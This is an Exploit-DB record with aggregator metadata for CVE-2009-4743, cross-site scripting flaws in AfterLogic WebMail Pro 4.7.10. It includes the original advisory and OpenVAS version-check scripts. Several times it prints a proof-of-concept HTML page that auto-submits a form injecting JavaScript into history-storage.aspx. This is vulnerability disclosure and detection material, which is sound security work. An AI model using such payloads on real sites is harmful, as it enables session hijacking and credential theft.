AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities
2009-10-06T00:00:00
ID EDB-ID:33268 Type exploitdb Reporter Sébastien Duquette Modified 2009-10-06T00:00:00
Description
AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities. CVE-2009-4743. Webapps exploit for asp platform
source: http://www.securityfocus.com/bid/36605/info
AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
AfterLogic WebMail Pro 4.7.10 and prior versions are affected.
<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html>
{"id": "EDB-ID:33268", "type": "exploitdb", "bulletinFamily": "exploit", "title": "AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities", "description": "AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities. CVE-2009-4743. Webapps exploit for asp platform", "published": "2009-10-06T00:00:00", "modified": "2009-10-06T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33268/", "reporter": "S\u00e9bastien Duquette", "references": [], "cvelist": ["CVE-2009-4743"], "lastseen": "2016-02-03T18:50:46", "viewCount": 1, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2016-02-03T18:50:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4743"]}, {"type": "openvas", "idList": ["OPENVAS:100314", "OPENVAS:1361412562310100314"]}, {"type": "exploitdb", "idList": ["EDB-ID:9857"]}], "modified": "2016-02-03T18:50:46", "rev": 2}, "vulnersScore": 5.2}, "sourceHref": "https://www.exploit-db.com/download/33268/", "sourceData": "source: http://www.securityfocus.com/bid/36605/info\r\n\r\nAfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.\r\n\r\nAttacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.\r\n\r\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected. \r\n\r\n<html> <head> </head> <body onLoad=\"document.form1.submit()\"> <form name=\"form1\" method=\"post\" action=\"http://www.example.com/history-storage.aspx?param=0.21188772204998574\" onSubmit=\"return false;\"> <input type=\"hidden\" name=\"HistoryKey\" value=\"value\"/> <input type=\"hidden\" name=\"HistoryStorageObjectName\" value=\"location; alert('xss'); //\"/> </form> </body> </html> ", "osvdbidlist": ["58712"]}
{"cve": [{"lastseen": "2020-12-09T19:31:24", "description": "Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters.", "edition": 5, "cvss3": {}, "published": "2010-03-26T20:30:00", "title": "CVE-2009-4743", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4743"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:afterlogic:webmail_pro:4.5", "cpe:/a:afterlogic:webmail_pro:4.7.10"], "id": "CVE-2009-4743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4743", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:afterlogic:webmail_pro:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:afterlogic:webmail_pro:4.7.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:14:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4743"], "description": "AfterLogic WebMail Pro is prone to multiple cross-site scripting\nvulnerabilities because the application fails to sufficiently sanitize\nuser-supplied data.\n\nAttacker-supplied HTML or JavaScript code could run in the context of\nthe affected site, potentially allowing the attacker to steal cookie-\nbased authentication credentials; other attacks are also possible.\n\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected.", "modified": "2016-11-18T00:00:00", "published": "2009-10-20T00:00:00", "id": "OPENVAS:100314", "href": "http://plugins.openvas.org/nasl.php?oid=100314", "type": "openvas", "title": "AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: AfterLogic_WebMail_Pro_36605.nasl 4574 2016-11-18 13:36:58Z teissa $\n#\n# AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"AfterLogic WebMail Pro is prone to multiple cross-site scripting\nvulnerabilities because the application fails to sufficiently sanitize\nuser-supplied data.\n\nAttacker-supplied HTML or JavaScript code could run in the context of\nthe affected site, potentially allowing the attacker to steal cookie-\nbased authentication credentials; other attacks are also possible.\n\nAfterLogic WebMail Pro 4.7.10 and prior versions are affected.\";\n\n\ntag_solution = \"Reports indicate that the vendor addressed these issues in WebMail Pro\n4.7.11, but Symantec has not confirmed this. Please contact the vendor\nfor more information.\";\n\nif (description)\n{\n script_id(100314);\n script_version(\"$Revision: 4574 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 14:36:58 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-20 18:54:22 +0200 (Tue, 20 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4743\");\n script_bugtraq_id(36605);\n\n script_name(\"AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\");\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"AfterLogic_WebMail_Pro_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/36605\");\n script_xref(name : \"URL\" , value : \"http://www.afterlogic.com/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\nif(!can_host_asp(port:port) && !can_host_php(port:port))exit(0);\n\nif(!version = get_kb_item(string(\"www/\", port, \"/AfterLogicWebMailPro\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n if(version_is_less(version: vers, test_version: \"4.7.10\")) {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4743"], "description": "AfterLogic WebMail Pro is prone to multiple cross-site scripting\n vulnerabilities because the application fails to sufficiently sanitize user-supplied data.", "modified": "2019-03-07T00:00:00", "published": "2009-10-20T00:00:00", "id": "OPENVAS:1361412562310100314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100314", "type": "openvas", "title": "AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: AfterLogic_WebMail_Pro_36605.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:afterlogic:mailbee_webmail_pro\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100314\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-20 18:54:22 +0200 (Tue, 20 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4743\");\n script_bugtraq_id(36605);\n\n script_name(\"AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"AfterLogic_WebMail_Pro_detect.nasl\");\n script_mandatory_keys(\"AfterLogicWebMailPro/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution\", value:\"Reports indicate that the vendor addressed these issues in WebMail Pro\n 4.7.11, but Symantec has not confirmed this. Please contact the vendor for more information.\");\n\n script_tag(name:\"summary\", value:\"AfterLogic WebMail Pro is prone to multiple cross-site scripting\n vulnerabilities because the application fails to sufficiently sanitize user-supplied data.\");\n\n script_tag(name:\"impact\", value:\"Attacker-supplied HTML or JavaScript code could run in the context of\n the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.\n Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"AfterLogic WebMail Pro 4.7.10 and prior versions are affected.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/36605\");\n script_xref(name:\"URL\", value:\"http://www.afterlogic.com/\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"4.7.10\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-01T11:23:52", "description": "AfterLogic WebMail Pro 4.7.10 xss. CVE-2009-4743. Webapps exploit for asp platform", "published": "2009-10-05T00:00:00", "type": "exploitdb", "title": "AfterLogic WebMail Pro 4.7.10 - XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4743"], "modified": "2009-10-05T00:00:00", "id": "EDB-ID:9857", "href": "https://www.exploit-db.com/exploits/9857/", "sourceData": "Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro\r\n\r\nDescription\r\n-------------\r\nAfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection\r\nof malicious code in the context of the application.\r\n\r\nOverview\r\n-----------\r\nQuote from http://www.afterlogic.com/products/webmail-pro :\r\n\"Webmail front-end for your existing POP3/IMAP mail server. Offer your users\r\nthe fast AJAX webmail and innovative calendar with sharing. Stay in control\r\nwith the admin panel and the developer's API.\"\r\n\r\nDetails\r\n--------\r\nVulnerable Product : AfterLogic WebMail Pro <= 4.7.10\r\nVulnerability Type : Cross-Site Scripting (XSS)\r\nAffected page : history-storage.aspx\r\nVulnerable parameters : HistoryKey, HistoryStorageObjectName\r\nDiscovered by :\r\nS\u0102\u0160bastien Duquette (http://intheknow-security.blogspot.com)\r\nGardien Virtuel (www.gardienvirtuel.com)\r\nOriginal Advisory :\r\nhttp://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt\r\n\r\nTimeline\r\n----------\r\nBug Discovered : September 18th, 2009\r\nVendor Advised : September 23rd, 2009\r\nFix made available : September 30th, 2009\r\n\r\nProof of concept\r\n-------------------\r\nThe targeted user must be logged in the webmail. This proof of concept was\r\nsuccessfully tested in Firefox 3.5 and Internet Explorer 8.\r\n\r\n<html>\r\n<head>\r\n</head>\r\n<body onLoad=\"document.form1.submit()\">\r\n<form name=\"form1\" method=\"post\"\r\naction=\"http://WEBSITE/history-storage.aspx?param=0.21188772204998574\";\r\nonSubmit=\"return false;\">\r\n<input type=\"hidden\" name=\"HistoryKey\" value=\"value\"/>\r\n<input type=\"hidden\" name=\"HistoryStorageObjectName\" value=\"location;\r\nalert('xss'); //\"/>\r\n</form>\r\n</body>\r\n</html>\r\n\r\nSolution\r\n---------\r\nThe vendor has made available a patched version. Update to AfterLogic\r\nWebmail Pro 4.7.11", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/9857/"}]}
